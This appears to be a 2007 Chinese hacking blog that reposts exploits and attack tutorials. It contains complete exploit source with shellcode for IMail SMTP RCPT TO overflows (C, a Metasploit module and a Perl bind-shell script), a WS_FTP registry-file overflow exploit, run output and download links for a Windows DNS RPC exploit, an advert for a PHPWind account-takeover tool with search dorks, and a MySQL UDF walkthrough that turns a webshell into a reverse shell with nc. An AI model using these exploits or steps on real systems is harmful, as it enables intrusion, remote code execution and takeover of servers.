注意，如果发现溢出允许的空间不足够SHELLCODE的代码，那么可以把地址放到前面去，SHELLCODE放在地址的后面，程序进行一些改动，原理一致 .

PHPWind 5.x Exploits 图形版

support@cnshark.net(admin) — Tue,01 May 2007 09:12:51 +0800

P.S：黑锅说。老外就是老外。一直非常BS崇拜老外的猪。在猪。非常之猪牛。
还说老外牛是所有通用的 .老外也一样认为老外牛
发现漏洞的意识太强。都怪JB中国的应试教育。害苦了现在的第四代黑客啊。

来源：neeao's Blog

-----------------------------------------------------------------
| PHPWind 5.x Exploits |
| |
| Powered by HamFast V1.12 20070101 |
| |
\---------------------------------------------------------------/

ATTANTION: Only do this bug test on your board!//仅仅用来测试你的论坛安全！
Don't attack any other site!//不要用于攻击其他网站

-----------------------------------------------------------------
BUGS:
Here is a very dangerous bug for PHPWind 5.x!!!! You can change
any user's password or register as a new user.

Ofcouse, you can change the admin's password, then the board will
be under control.

Maybe 80% of PHPWind boards have this bug.

This tools can exploit PHPWind 5.0.1 AND PHPWind 5.3.
----------------------------------------------------------------

Board Search:
----------------------------------------------------------------
http://www.baidu.com/s?tn=baidu&wd=powered+by+PHPWind+v5.0&ct=0
http://www.google.com/search?newwindow=1&q=powered+by+phpwind+v5.0

670)?'670px':'auto'}" alt="http://photo7.yupoo.com/20070406/145537_47077815_m.jpg" src="http://photo7.yupoo.com/20070406/145537_47077815_m.jpg" />

下载地址：http://www.neeao.com/Blog/attachments/200704/06_145904_pw5expgui.zip

MS Windows DNS RPC Remote Buffer Overflow Exploit

support@cnshark.net(admin) — Sun,22 Apr 2007 19:44:29 +0800

Exploit v2 features:
  - Target Remote port 445 (by default but requires auth)
  - Manual target for dynamic tcp port (without auth)
  - Automatic search for dynamic dns rpc port
  - Local and remote OS fingerprinting (auto target)
  - Windows 2000 server and Windows 2003 server (Spanish) supported by default
  - Fixed bug with Windows 2003 Shellcode
  - Universal local exploit for Win2k (automatic search for opcodes)
  - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
  - Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns)
  - Microsoft RPC api used ( who cares? :p )

D:\ProgramaciÃ³n\DNSTEST>dnstest
--------------------------------------------------------------
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
--------------------------------------------------------------

Usage:   dnstest -h 127.0.0.1 (Universal local exploit)
          dnstest -h host [-t id] [-p port]
Targets:
      0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3)
      1 (0x79467ef8) - Win2k  server SP4 Spanish -   (default for win2k )
      2 (0x7c4fedbb) - Win2k  server SP4 English
      3 (0x7963edbb) - Win2k  server SP4 Italian
      4 (0x41414141) - Windows all Denial of Service

D:\ProgramaciÃ³n\DNSTEST>dnstest.exe -h 192.168.1.2
--------------------------------------------------------------
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
--------------------------------------------------------------

[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444

also available at

http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip
http://www.milw0rm.com/sploits/04172007-dnsxpl.v2.1.zip

IMail 2006 and 8.x的Exp

support@cnshark.net(admin) — Fri,13 Apr 2007 02:32:51 +0800

来自：齐总的blog
C:\>imail2006_8.x_1.exe
IMail 2006 and 8.x SMTP 'RCPT TO:' Stack Overflow Exploit
Coded by Greg Linares < glinares.code [at] GMAIL [dot] com >
Usage: imail2006_8.x_1.exe [hostname] [port]
Default port is 25
==============================
Payload Options: 1 = Default
==============================
1 = Share C:\ as 'Export' Share
2 = Add User 'Error' with Password 'Error'
3 = Win32 Bind CMD to Port 4444
4 = Change Administrator Password to 'p@ssw0rd'
==============================
JMP Options: 1 = Default
==============================
1 = IMAIL 8.x SMTPDLL.DLL [pop ebp, ret] 0x10036f71
2 = Win2003 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af
3 = Win2003 SP0 English USER32.DLL [pop ebp, ret] 0x77d02289
4 = WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23
5 = WinXP SP1 - SP0 English USER32.DLL [pop ebp, ret] 0x71ab389c
6 = Win2000 Universal English USER32.DLL [pop ebp, ret] 0x75021397
7 = Win2000 Universal French USER32.DLL [pop ebp, ret] 0x74fa1397
8 = Windows XP SP1 - SP2 German USER32.DLL [pop ebp, ret] 0x77d18c14

点击下载

Imail 8.13-8.15 的EXP (win2000 and win2k3 chinese v

support@cnshark.net(admin) — Fri,13 Apr 2007 02:31:31 +0800

鬼仔：前段时间发过 IMail 2006 and 8.x的Exp ，但是那个是针对英文版的，当时就有朋友说“有中文版的就好了”，这次，就发一个中文版的：Test imail8.13,8.15 on win2000 and win2k3 chinese version.

来源：心路

写这个的时候，懒了一下，没有动态生成shellcode，而是直接使用了一个固定的key来编码，所以某些监听IP和端口会有问题，包含特殊字符，不过程序做了判断，直接不运行。—_—!
代码:
/*******************************************************************************
* Test imail8.13,8.15 on win2000 and win2k3 chinese version.
* code by 云舒,ph4nt0m.org,2006,11
* dou you know who is icy? ^_^
*******************************************************************************/

#include
#include

#pragma comment( lib, "ws2_32" )

#define HELO "EHLO\r\n"
#define FROM "MAIL FROM \r\n"

/*对shellcode进行编码解码*/
unsigned char shellcode[] =
/* decode */
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
/* decode key */
"\xbd\xd7\x50\x90"
"\x83\xeb\xfc\xe2\xf4"

/* shellcode */
"\x41\xbd\xbb\xdd\x55\x2e\xaf\x6f"
"\x42\xb7\xdb\xfc\x99\xf3\xdb\xd5\x81\x5c\x2c\x95\xc5\xd6\xbf\x1b"
"\xf2\xcf\xdb\xcf\x9d\xd6\xbb\xd9\x36\xe3\xdb\x91\x53\xe6\x90\x09"
"\x11\x53\x90\xe4\xba\x16\x9a\x9d\xbc\x15\xbb\x64\x86\x83\x74\xb8"
"\xc8\x32\xdb\xcf\x99\xd6\xbb\xf6\x36\xdb\x1b\x1b\xe2\xcb\x51\x7b"
"\xbe\xfb\xdb\x19\xd1\xf3\x4c\xf1\x7e\xe6\x8b\xf4\x36\x94\x60\x1b"
"\xfd\xdb\xdb\xe0\xa1\x7a\xdb\xd0\xb5\x89\x38\x1e\xf3\xd9\xbc\xc0"
"\x42\x01\x36\xc3\xdb\xbf\x63\xa2\xd5\xa0\x23\xa2\xe2\x83\xaf\x40"
"\xd5\x1c\xbd\x6c\x86\x87\xaf\x46\xe2\x5e\xb5\xf6\x3c\x3a\x58\x92"
"\xe8\xbd\x52\x6f\x6d\xbf\x89\x99\x48\x7a\x07\x6f\x6b\x84\x03\xc3"
"\xee\x94\x03\xd3\xee\x28\x80\xf8\x7d\x17\x90\x50\xdb\xbf\x77\x9f"
"\xdb\x84\xd9\x71\x28\xbf\xbc\x69\x17\xb7\x07\x6f\x6b\xbd\x40\xc1"
"\xe8\x28\x80\xf6\xd7\xb3\x36\xf8\xde\xba\x3a\xc0\xe4\xfe\x9c\x19"
"\x5a\xbd\x14\x19\x5f\xe6\x90\x63\x17\x42\xd9\x6d\x43\x95\x7d\x6e"
"\xff\xfb\xdd\xea\x85\x7c\xfb\x3b\xd5\xa5\xae\x23\xab\x28\x25\xb8"
"\x42\x01\x0b\xc7\xef\x86\x01\xc1\xd7\xd6\x01\xc1\xe8\x86\xaf\x40"
"\xd5\x7a\x89\x95\x73\x84\xaf\x46\xd7\x28\xaf\xa7\x42\x07\x38\x77"
"\xc4\x11\x29\x6f\xc8\xd3\xaf\x46\x42\xa0\xac\x6f\x6d\xbf\xa0\x1a"
"\xb9\x88\x03\x6f\x6b\x28\x80\x90";

void Usage( char *name )
{
printf( "\nCode by 云舒(ph4nt0m.org),thx luoluo(ph4nt0m.org)!\n" );
printf( "Test imail8.13,8.15 on win2000 and win2k3 chinese version.\n" );
printf( "Dou you know who is icy? ^_^\n" );
printf( "\nUsage: %s \n", name );
}

int main( int argc, char *argv[] )
{
if( argc != 5 )
{
Usage( argv[0] );
return -1;
}

unsigned int cb_ip = inet_addr(argv[3]);

/* encode input ip by encode key */
cb_ip ^= 0x9050d7bd;

/* offset of ip is 0xb8 */
memcpy( (void *)(shellcode+0xb8), &cb_ip, 4 );

unsigned short cb_port = htons( atoi(argv[4]) );

/* encode input port by encode key */
cb_port ^= 0x9050;

/* offset of port is 0xbe */
memcpy( (void *)(shellcode + 0xbe), &cb_port, 2 );

/* 判断IP和port异或之后是否有特殊字符 */
unsigned char error_char[6] = { 0x00,0x0D,0x0A,0x20,0x3e,0x22 };
unsigned char sz_ip[4] = { 0 };
unsigned char sz_port[2] = { 0 };

memcpy(sz_ip, (void *)&cb_ip, 4);
memcpy(sz_port, (void *)&cb_port, 2);

for( int index = 0; index < 6; index ++ )
{
for (int j = 0; j < sizeof(sz_ip); j ++)
{
if (sz_ip[j] == error_char[index])
{
printf( "rpwt,haha,please change to another ip adress!\n" );
return -1;
}
}
for (int j = 0; j < sizeof(sz_port); j ++)
{
if (sz_port[j] == error_char[index])
{
printf( "rpwt,haha,please change to another port\n");
return -1;
}
}
}

WSAData wsa;
SOCKET sock;
struct sockaddr_in sin;
int ret;

ret = WSAStartup( 0x0202, &wsa );
if( ret != 0 )
{
printf( "WSAStartup error: %d\n", GetLastError() );
return -1;
}

sock = socket( AF_INET, SOCK_STREAM, 0 );
if( sock == INVALID_SOCKET )
{
printf( "Create socket error: %d\n", GetLastError() );

WSACleanup( );
return -1;
}

memset( &sin, 0, sizeof(struct sockaddr_in) );
sin.sin_addr.S_un.S_addr = inet_addr( argv[1] );
sin.sin_family = AF_INET;
sin.sin_port = htons( atoi(argv[2]) );

ret = connect( sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in) );
if( ret == SOCKET_ERROR )
{
printf( "Connect error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}
printf( "Connect ok!\n" );

char recv_buf[512] = { 0 };

/* get banner */
ret = recv( sock, recv_buf, 512, 0 );
if( ret == SOCKET_ERROR )
{
printf( "Recv error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}
printf( "%s\n", recv_buf );

/* send hello */
ret = send( sock, HELO, strlen(HELO), 0 );
if( ret == SOCKET_ERROR )
{
printf( "Send error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}

/* recv */
memset( recv_buf, 0, 512 );
ret = recv( sock, recv_buf, 512, 0 );
if( ret == SOCKET_ERROR )
{
printf( "Recv error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}
printf( "%s\n", recv_buf );

/* send from */
ret = send( sock, FROM, strlen(FROM), 0 );
if( ret == SOCKET_ERROR )
{
printf( "Send error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}

/* recv */
memset( recv_buf, 0, 512 );
ret = recv( sock, recv_buf, 512, 0 );
if( ret == SOCKET_ERROR )
{
printf( "Recv error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}
printf( "%s\n", recv_buf );

char send_buf[1024] = { 0 };
char *ret_addr = "\xe1\x1e\xfa\x7f";

/* | 548 | */
/* RCPT TO <@:|x90.....shellcode|ret| */
strcat( send_buf, "RCPT TO <@:" );
for( int index = 1; index <= 548 - strlen((char *)shellcode); index ++ )
{
strcat( send_buf, "\x90" );
}
strcat( send_buf, (char *)shellcode );
strcat( send_buf, ret_addr );
strcat( send_buf, ">\r\n\r\n" );

/* send shellcode */
ret = send( sock, send_buf, strlen(send_buf), 0 );
if( ret == SOCKET_ERROR )
{
printf( "Send error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}
printf( "Send exploit %d bytes,check your listing port,good luck!\n", ret );

closesocket( sock );
WSACleanup( );
return 0;
}

Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow E

support@cnshark.net(admin) — Thu,12 Apr 2007 20:45:22 +0800

信息来源：邪恶八进制[code]##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::imail_smtp_rcpt_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };

my $info = {
'Name' => 'IMail 2006 and 8.x SMTP Stack Overflow Exploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'Jacopo Cervini ', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv' => 1,

'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 25],
'Encoder' => [1, 'EncodedPayload', 'Use Pex!!'],

},

'AutoOpts' => { 'EXITFUNC' => 'seh' },
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0d\x0a\x20\x3e\x22\x40",
'Keys' => ['+ws2ord'],

},

'Description' => Pex::Text::Freeform(qq{
This module exploits a stack based buffer overflow in IMail 2006 and 8.x SMTP service.
If we send a long strings for RCPT TO command contained within the characters '@' and ':'
we can overwrite the eip register and exploit the vulnerable smpt service
}),

'Refs' =>
[
['BID', '19885'],
['CVE', '2006-4379'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-06-028.html'],
],

'Targets' =>
[

['Universal IMail 8.10',0x100188c3 ], # pop eax, ret in SmtpDLL.dll for IMail 8.10
['Universal IMail 8.12',0x100191c4 ], # pop eax, ret in SmtpDLL.dll for IMail 8.12

],

'DefaultTarget' => 0,

'Keys' => ['smtp'],

'DisclosureDate' => 'September 7 2006',
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);

return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;

my $target = $self->Targets->[$target_idx];

my $ehlo = "EHLO " . "\r\n";

my $mail_from = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n";

my $pattern = "\x20\x3c\x40";
$pattern .= pack('V', $target->[1]);
$pattern .="\x3a" . $self->MakeNops((0x1e8-length ($shellcode)));
$pattern .= $shellcode;
$pattern .= "\x4a\x61\x63\x3e";

my $request = "RCPT TO: " . $pattern ."\n";

$self->PrintLine(sprintf ("

Trying ".$target->

[0]." using pop eax, ret at 0x%.8x...", $target->[1]));

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError) {
$self->PrintLine('

Error creating socket: ' . $s->GetError);
return;
}
my $r = $s->Recv(-1, 5);

$s->Send($ehlo);
$self->PrintLine("

I'm sending ehlo command");
$self->PrintLine("

$r");
sleep(2);

$s->Send($mail_from);
$self->PrintLine("

I'm sending mail from command");
$r = $s->Recv(-1, 10);
$self->PrintLine("

$r");
sleep(2);

$s->Send($request);
$self->PrintLine("

I'm sending rcpt to command");
sleep(2);

return;
}

[code]

Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow E

support@cnshark.net(admin) — Thu,12 Apr 2007 20:44:51 +0800

信息来源：邪恶八进制
#!/usr/bin/perl
# http://www.zerodayinitiative.com/advisories/ZDI-06-028.html
# http://www.securityfocus.com/bid/19885
#
# acaro [at] jervus.it

use IO::Socket::INET;
use Switch;

if (@ARGV < 3) {
print "--------------------------------------------------------------------\n";
print "Usage : Imail-rcpt-overflow.pl -hTargetIPAddress -oTargetReturnAddress\n";
print " Return address: \n";
print " o1 - IMail 8.12 Version\n";
print " o2 - IMail 8.10 Versio\n";
print " Example for IMail 8.12 Version: ./Imail-rcpt-overflow.pl -h127.0.0.1 -o1 \n";
print "--------------------------------------------------------------------\n";
}

use IO::Socket::INET;

my $host = 10.0.0.2;
my $port = 25;
my $reply;
my $request;
my $happystack="\x81\xc4\xff\xef\xff\xff\x44";

foreach (@ARGV) {
$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
$eip = $1 if ($_=~/-o(.*)/);
}

switch ($eip) {
case 1 { $eip="\xc4\x91\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.12
case 2 { $eip="\xc3\x88\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.10
}

# win32_bind - EXITFUNC=seh LPORT=4444

my $shellcode = "\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93".
"\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9".
"\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd".
"\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf".
"\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e".
"\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd".
"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd".
"\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66".
"\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6".
"\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34".
"\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65".
"\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7".
"\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e".
"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f".
"\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61".
"\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66".
"\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b".
"\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9".
"\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67".
"\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6".
"\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69".
"\xc0\x84\x6b\xc9\x43\x7b\xbd\x36";

my $nop="\x41"x137;

my $buffer = "RCPT TO:"."\x20\x3c\x40".$eip . "\x3a" .$nop.$happystack.$shellcode."\x4a\x61\x63\x3e"."\n";

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;

$request = "EHLO " . "\r\n";
send $socket, $request, 0;
print "[+] Sent EHLO\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;

$request = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n";
send $socket, $request, 0;
print "[+] Sent MAIL FROM\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;

$request = $buffer;
send $socket, $request, 0;
print "[+] Sent malicius request\n";
close $socket;

print " + connect on port 4444 of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;

源代碼加密與還原

support@cnshark.net(admin) — Thu,12 Apr 2007 19:22:34 +0800

http://www.jd100.net/ip/htmlcode.htm

关于ani 0day的简单分析

support@cnshark.net(admin) — Wed,11 Apr 2007 23:23:46 +0800

来源：Ph4nt0m Security Team

by axis
2007-03-28

本来没精力跟这个漏洞了，但是今天听swan在irc里说网上的exp利用方式不够好，只覆盖了2个字节，于是下午利用了一点空闲时间跟了一下。

在我的xp sp2 cn上，全补丁，漏洞发生在以下地方
77D53A5A 8BFF MOV EDI,EDI
77D53A5C 55 PUSH EBP
77D53A5D 8BEC MOV EBP,ESP
77D53A5F 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
77D53A62 8B55 10 MOV EDX,DWORD PTR SS:[EBP+10] ; 可以控制的长度
77D53A65 56 PUSH ESI
77D53A66 8B70 04 MOV ESI,DWORD PTR DS:[EAX+4]
77D53A69 8D0C16 LEA ECX,DWORD PTR DS:[ESI+EDX]
77D53A6C 3BCE CMP ECX,ESI
77D53A6E 72 28 JB SHORT USER32.77D53A98
77D53A70 3BCA CMP ECX,EDX
77D53A72 72 24 JB SHORT USER32.77D53A98
77D53A74 3B48 08 CMP ECX,DWORD PTR DS:[EAX+8]
77D53A77 77 1F JA SHORT USER32.77D53A98
77D53A79 53 PUSH EBX
77D53A7A 57 PUSH EDI
77D53A7B 8B7D 0C MOV EDI,DWORD PTR SS:[EBP+C] ; 目标buf [ebp+3c]
77D53A7E 8BCA MOV ECX,EDX ; 控制长度
77D53A80 8BD9 MOV EBX,ECX
77D53A82 C1E9 02 SHR ECX,2
77D53A85 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] ; 覆盖

拷贝发生在user32.dll中,注意这里
77D53A7B 8B7D 0C MOV EDI,DWORD PTR SS:[EBP+C] ; 目标buf [ebp+3c]
77D53A7E 8BCA MOV ECX,EDX ; 控制长度
77D53A80 8BD9 MOV EBX,ECX
77D53A82 C1E9 02 SHR ECX,2
77D53A85 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] ; 覆盖

edx控制我们拷贝的长度.
edx由ani文件的0x54偏移处传入，但是由于后面有一些判断，所以要触发这个拷贝，edx不能太大。

在我的xp sp2 cn all hotfix上，edx = 0x50 正好覆盖了上层函数的ebp

由于是从[ebp+3c]开始覆盖的，所以无法在当前函数返回时控制，我们可以选择覆盖上层函数的返回地址。

由于公开的exp中只覆盖了user32.dll中的两个字节地址，这个不是很通用，所以swan会有前面那段话。

事实上，可以覆盖掉整个ebp，ebp+4，控制eip。

从codepage去找个中文的通用地址是很简单的。

而且这个dll没有/gs保护，所以利用起来很简单。

不同的平台，比如2000/2003上需要覆盖的字节可能不同。

但是这个漏洞只覆盖[ebp+4]处的2个字节，还是在user32.dll里,一般不会崩溃

但是如果把整个eip都覆盖了，如果平台差异引起了覆盖字节数不同，就会造成ie崩溃

想必这就是为什么公开的exp只覆盖2个字节，插入2个图片的原因(那两个图片的长度控制值不同，覆盖的2个字节也不同)

要查杀这个也很简单，各大AV只需要判断这个传入edx的长度是否超过了限制就可以了。

Ipswitch WS_FTP 5.05 Server Manager Local Site Buf

support@cnshark.net(admin) — Wed,11 Apr 2007 23:20:50 +0800

/****************************************************************************
*      Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflow       *
*                                                                           *
*                                                                           *
* There's a buffer overflow in iftpmgr.exe that can be triggered by         *
* registering a long site command. The result is then saved in the registry *
* and every time the group is checked the bug appears.                      *
* This exploit launches calc.exe.                                           *
*                                                                           *
* Tested against Win XP SP2 FR.                                             *
* Have Fun!                                                                 *
*                                                                           *
* Coded and discovered by Marsu                 *
****************************************************************************/

#include "stdio.h"
#include "stdlib.h"

/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=165 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26"
"\x45\x32\xe3\x83\xeb\xfc\xe2\xf4\xda\xad\x76\xe3\x26\x45\xb9\xa6"
"\x1a\xce\x4e\xe6\x5e\x44\xdd\x68\x69\x5d\xb9\xbc\x06\x44\xd9\xaa"
"\xad\x71\xb9\xe2\xc8\x74\xf2\x7a\x8a\xc1\xf2\x97\x21\x84\xf8\xee"
"\x27\x87\xd9\x17\x1d\x11\x16\xe7\x53\xa0\xb9\xbc\x02\x44\xd9\x85"
"\xad\x49\x79\x68\x79\x59\x33\x08\xad\x59\xb9\xe2\xcd\xcc\x6e\xc7"
"\x5C\x22\x86\x03\x23\x42\xce\x72\xd3\xa3\x85\x4a\xef\xad\x05\x3e"
"\x68\x56\x59\x9f\x68\x4e\x4d\xd9\xea\xad\xc5\x82\xe3\x26\x45\xb9"
"\x8b\x1a\x1a\x03\x15\x46\x13\xbb\x1b\xa5\x85\x49\xb3\x4e\x3b\xea"
"\x01\x55\x2d\xaa\x1d\xac\x4b\x65\x1c\xc1\x26\x53\x8f\x45\x6b\x57"
"\x9b\x43\x45\x32\xe3";

int main(int argc, char* argv[])
{
    FILE* regfile;
    char evilbuff[250];

    printf("[+] Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflow\n");
    printf("[+] Coded and discovered by Marsu \n");
    if (argc!=3) {
        printf("[+] Usage: %s \n",argv[0]);
        printf("[+] ex:    %s Marsu Pilami.reg\n",argv[0]);
        return 0;
    }

    memset(evilbuff,'C',250);
    memcpy(evilbuff+4,CalcShellcode,strlen(CalcShellcode));
    memcpy(evilbuff+202,"\x46\xE4\xBD\x7C",4);    /*00 50 00 00 in Shell32.dll. We need this to jump back to our shellcode =)
                              CALL DWORD PTR DS:[EDX+90] and our code is at 0x00500040 in DS*/
    memset(evilbuff+215,0,1);

    regfile=fopen(argv[2],"wb");
    fprintf(regfile,"Windows Registry Editor Version 5.00\r\n\r\n");
    fprintf(regfile,"[HKEY_LOCAL_MACHINE\\SOFTWARE\\Ipswitch\\iFtpSvc\\Domains\\%s\\Commands]\r\n\r\n",argv[1]);
    fprintf(regfile,"[HKEY_LOCAL_MACHINE\\SOFTWARE\\Ipswitch\\iFtpSvc\\Domains\\%s\\Commands\\aa]\r\n\"_Executable\"=\"%s\"\r\n",argv[1],evilbuff);
    fprintf(regfile,"\"_Arguments\"=\"%s\"\r\n",evilbuff);
    fprintf(regfile,"\"*everyone\"=dword:000000ff\r\n\r\n");
    fclose(regfile);
    printf("[+] Done. Have fun!\n");
    return 0;

}

// milw0rm.com [2007-04-02]

WEBSHELL提升权限又一招（Mysql漏洞）

support@cnshark.net(admin) — Wed,11 Apr 2007 23:20:17 +0800

作者：hack520 来源：华夏黑客同盟

S-serv提权方式人人都会用了，搞得现在的主机都配置得非常安全，看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一，还有其他的pcanywhere获取密码，替换服务，等等。但是现在也没这么好搞了，随着安全意识的提高，之前的方式估计不怎么管用，现在我给大家介绍一下一种新的提权方式，看过古典LM做的那动画的朋友都知道吧？利用MYSQLl弱口令拿到系统权限，在WEBSHEL上也可实现，不过有个前提，就是目标主机装有MYSQL，而你又知道MYSQL的用户和密码，才可以进行提权。WEBSHELL获得了，找用户和密码也不是什么难事。现在我拿我另外一台机器做示范，已经把PHPSHELL传上去了，如图1

一般来说连接MYSQL的帐户密码很好找，随便编辑一个PHP文件，就看到了。如图2

看到了吧，用户名：root 密码：123456 库名：php 然后怎么办呢？先用SQL Query 建立连接，如图3

哈连接成功了，现在开始将我们的提权用滴东东:Mix.dll My_udf.dll上传上去先.OK，传好了，Mix.dll用于反弹连接，My_udf.dll是正向连接，直接用连接对方的3306端口然后输入密码就可获得CMDSHELL。好，不多说了，传上去之后呢就执行以下SQL语句create function Mixconnect returns string soname 'd:\\php\\php\\Mix.dll'; 来注册函数.
出现SQL语句成功执行！如图4

离拿到CMDSHELL已经不远了，我们先用NC在本地监听一个端口先，Nc -l -p 1234 （这个我想不用截图了吧）而后执行语句：select Mixconnect('192.168.1.254','1234'); 来激活那个函数，如图5

执行成功，然后看看我们的NC有反映没，如图6

成功得到CMSHELL，不过这时对方的MYSQL已经假死咯，我们要把MYSQL服务进程给kill掉，然后重新启动MYSQL服务才行，不然管理员发现网站运行不了了，那就。。。。如果该服务器不允许连接任何外部IP和端口，而他的3306端口却是对外开的！这时My_udf.dll就该上场了，使用方法和Mix一样，连接MYSQL成功后执行如下语句：create function my_udfdoor returns string soname 'D:\\php\\php\my_udf.dll'; 执行语句成功后，然后我们就开始激活这个函数，输入语句：select my_udfdoor (''); 然后用nc连接3306端口,然后输入fuck 就可以得到一个cmdshell了如图7

OK成功！测试结束咯

HTTP调试工具：Fiddler介绍一

support@cnshark.net(admin) — Wed,11 Apr 2007 22:00:42 +0800

Fiddler工具介绍一
(原文地址：http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnwebgen/html/IE_IntroFiddler.asp)

